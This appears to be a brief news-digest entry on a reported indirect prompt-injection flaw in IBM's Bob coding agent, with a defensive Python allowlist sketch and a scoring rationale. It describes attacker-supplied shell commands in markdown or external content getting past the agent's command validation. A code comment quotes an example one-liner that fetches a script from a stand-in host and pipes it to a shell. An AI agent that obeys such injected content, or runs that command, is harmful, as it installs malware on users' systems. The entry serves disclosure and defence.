IBM Bob Enables Malware Execution via Prompt Injection

In late 2025, cybersecurity researchers reported that IBM's AI coding agent, Bob, can be tricked into downloading and executing malware via indirect prompt injection. Controlled tests by PromptArmor, along with reporting from The Register and TechRadar, showed that Bob's command validation fails when it parses external or markdown-embedded content, allowing attacker-supplied shell commands to run. The flaw raises enterprise security concerns and has prompted calls for sandboxing, multi-layer command validation, and human review of agent actions.
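As a rough illustration of the "multi-layer validation" mitigation, the sketch below shows one such layer: an allowlist check an agent could apply before executing any shell command, whether the instruction came from the user or from fetched content. All names and the allowlist policy here are hypothetical, not drawn from Bob's actual implementation.

```python
import shlex

# Hypothetical policy: only these programs may be invoked (illustrative).
ALLOWED_PROGRAMS = {"ls", "cat", "git", "python"}

def is_command_allowed(command: str) -> bool:
    """Return True only if the command starts with an allowlisted
    program and contains no shell metacharacters that could chain
    or redirect execution (a common prompt-injection vector)."""
    # Reject pipes, chaining, substitution, and redirection outright.
    if any(ch in command for ch in ";&|`$><"):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes or similar malformed input
        return False
    return bool(tokens) and tokens[0] in ALLOWED_PROGRAMS
```

A check like this would block a classic injected payload such as `curl http://evil.example/payload.sh | sh` (pipe rejected) while permitting `ls -la`. On its own it is far from sufficient; it would sit alongside sandboxed execution and human review.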
Scoring Rationale
High novelty and industry-wide impact driven by real exploit demonstrations, limited by lack of official IBM disclosure and full technical details.